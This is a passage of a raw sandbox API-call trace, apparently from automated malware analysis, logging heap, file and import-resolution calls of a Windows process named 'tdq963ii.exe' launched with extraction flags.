hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3042a8 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304218 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3041c0 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.874] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0ab8 | out: hHeap=0x2f0000) returned 1 [0188.874] GetProcessHeap () returned 0x2f0000 [0188.874] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304170 | out: hHeap=0x2f0000) returned 1 [0188.874] GetProcessHeap () returned 0x2f0000 [0188.874] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1230 | out: hHeap=0x2f0000) returned 1 [0188.874] _get_osfhandle (_FileHandle=3) returned 0x74 [0188.874] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0188.874] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cefe0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cefe0*=0x0, lpOverlapped=0x0) returned 1 [0188.874] GetLastError () returned 0x0 [0188.874] _get_osfhandle (_FileHandle=3) returned 0x74 [0188.874] GetFileType (hFile=0x74) returned 0x1 [0188.874] _get_osfhandle (_FileHandle=3) returned 0x74 [0188.874] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0188.874] GetProcessHeap () returned 0x2f0000 [0188.874] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x400a) returned 0x314b08 [0188.874] GetProcessHeap () returned 0x2f0000 [0188.875] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314b08 | out: hHeap=0x2f0000) returned 1 [0188.875] _get_osfhandle (_FileHandle=3) returned 0x74 [0188.875] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0188.875] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cefc4, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cefc4*=0x0, lpOverlapped=0x0) returned 1 [0188.875] GetLastError () returned 0x0 [0188.875] _get_osfhandle (_FileHandle=3) returned 0x74 [0188.875] GetFileType (hFile=0x74) returned 0x1 [0188.875] _get_osfhandle (_FileHandle=3) returned 0x74 [0188.876] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0188.876] GetProcessHeap () returned 0x2f0000 [0188.876] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x400a) returned 0x314b08 [0188.876] GetProcessHeap () returned 0x2f0000 [0188.876] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314b08 | out: hHeap=0x2f0000) returned 1 [0188.876] longjmp () [0188.876] _tell (_FileHandle=3) returned 226 [0188.876] _close (_FileHandle=3) returned 0 [0188.876] CmdBatNotification () returned 0x1 [0188.876] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.877] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.877] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0188.878] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.878] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0188.878] SetConsoleInputExeNameW () returned 0x1 [0188.878] GetConsoleOutputCP () returned 0x1b5 [0188.879] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0188.879] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.879] exit (_Code=1) Process: id = "133" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x37712000" os_pid = "0x340" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x6c8" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 610 os_tid = 0x6dc [0116.876] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0116.879] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0116.880] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0116.881] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0116.882] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0116.883] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0116.884] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0116.884] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0116.885] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0116.885] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0116.886] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0116.886] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0116.886] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0116.886] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0116.886] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0116.886] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0116.886] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0116.886] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0116.886] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0116.887] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0116.887] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0116.887] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0116.887] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0116.887] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0116.887] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0116.887] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0116.887] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0116.887] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0116.887] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0116.887] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0116.888] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0116.888] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0116.888] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0116.889] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0116.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xd0aed00, dwHighDateTime=0x1d68287)) [0116.892] GetCurrentThreadId () returned 0x6dc [0116.892] GetCurrentProcessId () returned 0x340 [0116.892] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=23723091044) returned 1 [0116.897] GetProcessHeap () returned 0x590000 [0118.466] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0118.466] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0118.466] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0118.467] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0118.467] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0118.467] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0118.467] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0118.467] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0118.467] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0118.467] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0118.468] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0118.468] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0118.468] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0118.468] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0118.468] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0118.468] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0118.468] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0118.469] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0118.469] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0118.469] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0118.469] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0118.469] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0118.469] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0118.470] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0118.470] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0118.470] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0118.470] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0118.470] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0118.470] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0118.470] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0118.471] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0118.471] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0118.471] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0118.471] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0118.490] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3bc) returned 0x5a70b0 [0118.490] GetCurrentThreadId () returned 0x6dc [0118.490] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5a7478 [0118.491] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x800) returned 0x5a7498 [0118.491] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x8addcec6, hStdError=0x0)) [0118.491] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0118.491] GetFileType (hFile=0x3) returned 0x2 [0118.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.492] GetFileType (hFile=0x7) returned 0x2 [0118.492] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0118.492] GetFileType (hFile=0xb) returned 0x2 [0118.493] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0118.493] GetEnvironmentStringsW () returned 0x5a7ca0* [0118.494] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xb8c) returned 0x5a8838 [0118.847] FreeEnvironmentStringsW (penv=0x5a7ca0) returned 1 [0118.847] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0118.847] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x94) returned 0x5a7ca0 [0118.852] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa0) returned 0x5a7d40 [0118.852] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3e) returned 0x5a4de0 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x6c) returned 0x5a7de8 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x6e) returned 0x5a7e60 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x78) returned 0x59f910 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x62) returned 0x5a7ed8 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5a7f48 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5a7f80 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5a7fd0 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x5a8008 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x5a6a80 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4a) returned 0x5a8038 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x72) returned 0x59f990 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5a8090 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5a80c8 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x5a6aa8 [0118.856] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd2) returned 0x5a8100 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x7c) returned 0x5a81e0 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x36) returned 0x5a8268 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3a) returned 0x5a4e28 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x90) returned 0x5a82a8 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x5a8340 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5a8370 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x36) returned 0x5a83a8 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5a83e8 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x52) returned 0x5a8438 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a4e70 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x5a8498 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x82) returned 0x5a84b8 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5a8548 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x5a6ad0 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2c) returned 0x5a8580 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a85b8 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x52) returned 0x5a8618 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x5a8678 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a4eb8 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a86b0 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x5a8710 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5a8740 [0118.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x8c) returned 0x5a8778 [0118.857] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8838 | out: hHeap=0x590000) returned 1 [0119.454] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x800) returned 0x5a8810 [0119.454] GetLastError () returned 0x0 [0119.455] SetLastError (dwErrCode=0x0) [0119.455] GetLastError () returned 0x0 [0119.455] SetLastError (dwErrCode=0x0) [0119.455] GetLastError () returned 0x0 [0119.455] SetLastError (dwErrCode=0x0) [0119.455] GetACP () returned 0x4e4 [0119.455] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x220) returned 0x5a9018 [0119.455] GetLastError () returned 0x0 [0119.455] SetLastError (dwErrCode=0x0) [0119.455] IsValidCodePage (CodePage=0x4e4) returned 1 